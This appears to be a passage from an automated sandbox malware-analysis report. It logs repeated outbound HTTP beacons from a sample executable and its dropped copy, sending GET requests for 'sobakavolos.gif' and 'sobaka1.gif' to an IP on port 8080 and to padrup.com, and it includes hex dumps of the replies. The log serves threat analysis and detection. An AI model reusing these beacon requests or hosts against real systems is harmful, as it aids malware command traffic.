X-Pcrew-Blocked-Reason: hosting network
X-Domain: padrup.com
                                                                                                                                                                                                                                  X-Subdomain:
                                                                                                                                                                                                                                  Data Raw: 37 39 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
Data Ascii: 793<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
Oct 18, 2024 09:39:39.248302937 CEST | 1236 | IN | Data Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTIzNzE3OC44OTY2OmU1NjUyMGViM2YzYzBjYzc0YzlkMWMwNjJmMmQyZDcwNzZkY2FlOWVlM2M0OGFiMDA2MWRiMWZhNjRiNzA5ZWE6NjcxMjEwYmFkYWU0ZA==';
Oct 18, 2024 09:39:39.248338938 CEST | 424 | IN | Data Raw: 29 20 3d 3d 3d 20 27 27 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e
Data Ascii: ) === '') { return; } console.log(JSON.parse(xhr.responseText)) } else { console.log('There was a problem with the request.'); } } }
Oct 18, 2024 09:39:39.248414993 CEST | 340 | IN | Data Raw: 0d 0a 31 34 36 0d 0a 35 38 61 32 31 35 31 27 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e
Data Ascii: 14658a2151');</script><script type='text/javascript' language='JavaScript'>window.onload = function() {if(clickTracking && typeof track_onclick == 'function') track_onclick("6568ca3c198765a2c3c6d04aa2e4186282ac1f83");top.location.h


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.7 | 62527 | 190.120.227.91 | 8080 | 7272 | C:\Users\user\Desktop\PfBjDhHzvV.exe
Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 09:39:39.281799078 CEST | 169 | OUT | GET /sobakavolos.gif?1c6e18df=476977375 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: 190.120.227.91:8080
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.7 | 62528 | 185.53.178.50 | 80 | 6152 | C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe
Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 09:39:44.093604088 CEST | 153 | OUT | GET /sobaka1.gif?8dc219=65031855 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: padrup.com
Cache-Control: no-cache
Oct 18, 2024 09:39:45.318846941 CEST | 1236 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 18 Oct 2024 07:39:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Redirect: skenzo
X-Buckets: bucket102
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_CTHyzqhRLcqbooyFH02ibSJ+jpzB/qJaNMX6/b2Wwtpnxk1zH35mi8eZrS7mYg/7Utt61DNUoj/u3WOTsf3XJw==
X-Template: tpl_CleanPeppermintBlack_twoclick
X-Language: english
Accept-CH: viewport-width
Accept-CH: dpr
Accept-CH: device-memory
Accept-CH: rtt
Accept-CH: downlink
Accept-CH: ect
Accept-CH: ua
Accept-CH: ua-full-version
Accept-CH: ua-platform
Accept-CH: ua-platform-version
Accept-CH: ua-arch
Accept-CH: ua-model
Accept-CH: ua-mobile
Accept-CH-Lifetime: 30
X-Pcrew-Ip-Organization: QuadraNet
X-Pcrew-Blocked-Reason: hosting network
X-Domain: padrup.com
X-Subdomain:
                                                                                                                                                                                                                                  Data Raw: 37 39 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
Data Ascii: 793<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
Oct 18, 2024 09:39:45.318953991 CEST | 1236 | IN | Data Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTIzNzE4NC44MTk6OWRhOGEyNDhmZjVlZGY5N2IxNzZmY2FmODZiY2VjY2JlMDZiZjM3ZmE0NDNmY2E5MGQzMzM3ZmM3Nzg1MGM3Mzo2NzEyMTBjMGM3ZjBh';var
Oct 18, 2024 09:39:45.318989992 CEST | 424 | IN | Data Raw: 3d 20 27 27 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 73 6f 6c 65
Data Ascii: = '') { return; } console.log(JSON.parse(xhr.responseText)) } else { console.log('There was a problem with the request.'); } } }
Oct 18, 2024 09:39:45.319067955 CEST | 336 | IN | Data Raw: 0d 0a 31 34 32 0d 0a 32 62 35 27 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 77 69 6e
Data Ascii: 1422b5');</script><script type='text/javascript' language='JavaScript'>window.onload = function() {if(clickTracking && typeof track_onclick == 'function') track_onclick("6568ca3c198765a2c3c6d04aa2e4186282ac1f83");top.location.href
Oct 18, 2024 09:39:45.319226980 CEST | 336 | IN | Data Raw: 0d 0a 31 34 32 0d 0a 32 62 35 27 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 77 69 6e
Data Ascii: 1422b5');</script><script type='text/javascript' language='JavaScript'>window.onload = function() {if(clickTracking && typeof track_onclick == 'function') track_onclick("6568ca3c198765a2c3c6d04aa2e4186282ac1f83");top.location.href


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.7 | 62529 | 190.120.227.91 | 8080 | 6152 | C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe
Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 09:39:45.458210945 CEST | 166 | OUT | GET /sobakavolos.gif?90f197=37996124 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: 190.120.227.91:8080
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.7 | 62530 | 185.53.178.50 | 80 | 6152 | C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe
Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 09:39:54.243789911 CEST | 155 | OUT | GET /sobaka1.gif?16eca60=240379840 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: padrup.com
Cache-Control: no-cache
Oct 18, 2024 09:39:55.329929113 CEST | 1236 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 18 Oct 2024 07:39:55 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Redirect: skenzo
X-Buckets: bucket102
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_tjbmutKlA1TUfIdMRYl30aiMN0rCcHVRf9AEsj+n+E+W1pAKE5v0yJYPwOk5pTVzjmJxyfYEwCEsBkEhw2v3Zg==
X-Template: tpl_CleanPeppermintBlack_twoclick
X-Language: english
Accept-CH: viewport-width
Accept-CH: dpr
Accept-CH: device-memory
Accept-CH: rtt
Accept-CH: downlink
Accept-CH: ect
Accept-CH: ua
Accept-CH: ua-full-version
Accept-CH: ua-platform
Accept-CH: ua-platform-version
Accept-CH: ua-arch
Accept-CH: ua-model
                                                                                                                                                                                                                                  Accept-CH: ua-mobile
                                                                                                                                                                                                                                  Accept-CH-Lifetime: 30
                                                                                                                                                                                                                                  X-Pcrew-Ip-Organization: QuadraNet
                                                                                                                                                                                                                                  X-Pcrew-Blocked-Reason: hosting network
                                                                                                                                                                                                                                  X-Domain: padrup.com
                                                                                                                                                                                                                                  X-Subdomain:
                                                                                                                                                                                                                                  Data Raw: 37 39 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
                                                                                                                                                                                                                                  Data Ascii: 793<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:55.330001116 CEST1236INData Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
                                                                                                                                                                                                                                  Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTIzNzE5NC45OTo0Y2M3NmJjYTg5N2I4ZjdhODAxZmM5MWZhNGNhMjhmMDUyYWQxMjU2NzM5OGRiZmFiOThhNGY0MWY1ZDBiNmM0OjY3MTIxMGNhZjFiMmU=';var
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:55.330038071 CEST424INData Raw: 3d 20 27 27 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 73 6f 6c 65
                                                                                                                                                                                                                                  Data Ascii: = '') { return; } console.log(JSON.parse(xhr.responseText)) } else { console.log('There was a problem with the request.'); } } }
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:55.330070972 CEST336INData Raw: 0d 0a 31 34 32 0d 0a 66 31 64 27 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 77 69 6e
                                                                                                                                                                                                                                  Data Ascii: 142f1d');</script><script type='text/javascript' language='JavaScript'>window.onload = function() {if(clickTracking && typeof track_onclick == 'function') track_onclick("6568ca3c198765a2c3c6d04aa2e4186282ac1f83");top.location.href


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.7 | 62531 | 190.120.227.91 | 8080 | 6152 | C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe
Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 09:39:55.388773918 CEST | 168 | OUT | GET /sobakavolos.gif?1883db2=179941342 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: 190.120.227.91:8080
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.7 | 62532 | 185.53.178.50 | 80 | 6152 | C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe
Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 09:40:04.099690914 CEST | 155 | OUT | GET /sobaka1.gif?29e644c=439347960 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: padrup.com
Cache-Control: no-cache
Oct 18, 2024 09:40:05.184223890 CEST | 1236 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 18 Oct 2024 07:40:05 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Redirect: skenzo
X-Buckets: bucket102
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_bOOmWBqELXlKN8YjEa1ZXqA74oiLLfNbY8mBdFMoL6Ti7K/v1PhVOCPSZgw7aFHEq7g9/hOmqz/32pFQBuNHRQ==
X-Template: tpl_CleanPeppermintBlack_twoclick
X-Language: english
Accept-CH: viewport-width
Accept-CH: dpr
Accept-CH: device-memory
Accept-CH: rtt
Accept-CH: downlink
Accept-CH: ect
Accept-CH: ua
Accept-CH: ua-full-version
Accept-CH: ua-platform
Accept-CH: ua-platform-version
Accept-CH: ua-arch
Accept-CH: ua-model
Accept-CH: ua-mobile
Accept-CH-Lifetime: 30
X-Pcrew-Ip-Organization: QuadraNet
X-Pcrew-Blocked-Reason: hosting network
X-Domain: padrup.com
X-Subdomain:
Data Raw: 37 39 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
Data Ascii: 793<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
Oct 18, 2024 09:40:05.184310913 CEST | 1236 | IN | Data Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTIzNzIwNC44MTk1OmJlNzE3ODRmZTA4MzUxZDcxYmFlM2Q4NDY1ZDQyMDA2NDM1NmM2M2I4Y2JmYmRmM2Q2NzZmZWNmMmM2Nzc1Yjc6NjcxMjEwZDRjODBmZA==';
Oct 18, 2024 09:40:05.184323072 CEST | 424 | IN | Data Raw: 29 20 3d 3d 3d 20 27 27 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e
Data Ascii: ) === '') { return; } console.log(JSON.parse(xhr.responseText)) } else { console.log('There was a problem with the request.'); } } }
Oct 18, 2024 09:40:05.184442043 CEST | 340 | IN | Data Raw: 0d 0a 31 34 36 0d 0a 31 37 65 64 33 39 64 27 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e
Data Ascii: 14617ed39d');</script><script type='text/javascript' language='JavaScript'>window.onload = function() {if(clickTracking && typeof track_onclick == 'function') track_onclick("6568ca3c198765a2c3c6d04aa2e4186282ac1f83");top.location.h


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.7 | 62533 | 190.120.227.91 | 8080 | 6152 | C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe
Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 09:40:05.202590942 CEST | 168 | OUT | GET /sobakavolos.gif?2c177da=138700686 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: 190.120.227.91:8080
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.7 | 62534 | 185.53.178.50 | 80 | 6152 | C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe
Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 09:40:13.911405087 CEST | 154 | OUT | GET /sobaka1.gif?3d9ecca=64613578 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: padrup.com
Cache-Control: no-cache
Oct 18, 2024 09:40:15.013777018 CEST | 1236 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 18 Oct 2024 07:40:14 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Redirect: skenzo
X-Buckets: bucket102
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_glaMm5vgAXkKzCgz8TDXWZaP6PWVEk+VpcjneU0cVkX9Pi3IsQD4nRe21961dqequKEkxLpPuJ50peWGdWUtdw==
X-Template: tpl_CleanPeppermintBlack_twoclick
X-Language: english
Accept-CH: viewport-width
Accept-CH: dpr
Accept-CH: device-memory
Accept-CH: rtt
Accept-CH: downlink
Accept-CH: ect
Accept-CH: ua
Accept-CH: ua-full-version
Accept-CH: ua-platform
Accept-CH: ua-platform-version
                                                                                                                                                                                                                                  Accept-CH: ua-arch
                                                                                                                                                                                                                                  Accept-CH: ua-model
                                                                                                                                                                                                                                  Accept-CH: ua-mobile
                                                                                                                                                                                                                                  Accept-CH-Lifetime: 30
                                                                                                                                                                                                                                  X-Pcrew-Ip-Organization: QuadraNet
                                                                                                                                                                                                                                  X-Pcrew-Blocked-Reason: hosting network
                                                                                                                                                                                                                                  X-Domain: padrup.com
                                                                                                                                                                                                                                  X-Subdomain:
                                                                                                                                                                                                                                  Data Raw: 37 39 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
                                                                                                                                                                                                                                  Data Ascii: 793<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:15.013797045 CEST1236INData Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
                                                                                                                                                                                                                                  Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTIzNzIxNC42NDQ6MTEyZDZkYjRhYzk3Nzc1MjUyZGMyZTI3Zjk2ZjFmZjBlMDEzODVlNzZiNDkwYjJkMDNlMjFkYzViYzMyMGI1NDo2NzEyMTBkZTlkMzg0';var
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:15.013926029 CEST760INData Raw: 3d 20 27 27 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 73 6f 6c 65
                                                                                                                                                                                                                                  Data Ascii: = '') { return; } console.log(JSON.parse(xhr.responseText)) } else { console.log('There was a problem with the request.'); } } }


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
39         | 192.168.2.7 | 62535       | 190.120.227.91 | 8080             | 6152 | C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe

Timestamp                            | Bytes transferred | Direction | Data
Oct 18, 2024 09:40:15.037476063 CEST | 168               | OUT       | GET /sobakavolos.gif?3fa5859=600644385 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: 190.120.227.91:8080
Cache-Control: no-cache


Target ID: 0
Start time: 03:38:12
Start date: 18/10/2024
Path: C:\Users\user\Desktop\PfBjDhHzvV.exe
Wow64 process (32bit): true
